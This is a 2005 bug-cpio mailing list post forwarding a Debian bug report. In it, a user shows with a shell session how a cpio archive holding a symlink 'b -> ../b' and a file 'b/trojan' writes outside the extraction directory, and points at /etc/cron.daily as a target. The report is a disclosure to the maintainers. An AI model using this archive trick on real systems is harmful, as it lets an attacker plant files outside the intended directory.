bug-cpio
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Bug-cpio] Fwd: Bug#306693: cpio: allows extracting insecure pathnames (


From: t takahashi
Subject: [Bug-cpio] Fwd: Bug#306693: cpio: allows extracting insecure pathnames (leading slash = / and dotdot = ..)
Date: Fri, 6 May 2005 17:52:29 -0700

Part 2.

---------- Forwarded message ----------
From: t takahashi <address@hidden>
Date: Apr 27, 2005 7:54 PM
Subject: Re: Bug#306693: cpio: allows extracting insecure pathnames
(leading slash = / and dotdot = ..)
To: address@hidden, address@hidden
Cc: address@hidden


P.P.S.  I found a more subtle security hole.  It is even more dangerous.

/tmp/aaa$ mkdir ../b
/tmp/aaa$ ln -s ../b b
/tmp/aaa$ touch ../b/trojan
/tmp/aaa$ ls b
trojan
/tmp/aaa$ find b b/trojan
b
b/trojan
/tmp/aaa$ find b b/trojan | cpio -o > dangerous
cpio: b: truncating inode number
cpio: b/trojan: truncating inode number
1 block
/tmp/aaa$ /bin/rm -v b/trojan b
removed `b/trojan'
removed `b'
/tmp/aaa$ ls
dangerous
/tmp/aaa$ cpio -t<dangerous
b
b/trojan
1 block
/tmp/aaa$ cpio -vt<dangerous
lrwxrwxrwx   1 kpc      kpc             4 Apr 27 19:46 b -> ../b
-rw-------   1 kpc      kpc             0 Apr 27 19:46 b/trojan
1 block

Notice that grep '\.\.' on the output of cpio -t would not find the
relative pathname.  You have to use cpio -vt.  Now watch this:

/tmp/aaa$ cpio -i<dangerous
1 block
/tmp/aaa$ ls
b  dangerous
/tmp/aaa$ ls ../b
trojan

IMHO cpio should disallow this by default.  Imagine
../../../../../../../etc/cron.daily again.  cpio should check for
extracting in directories that are not below pwd, even if it is via
indirect means such as a symlink.

Wow!




reply via email to

[Prev in Thread] Current Thread [Next in Thread]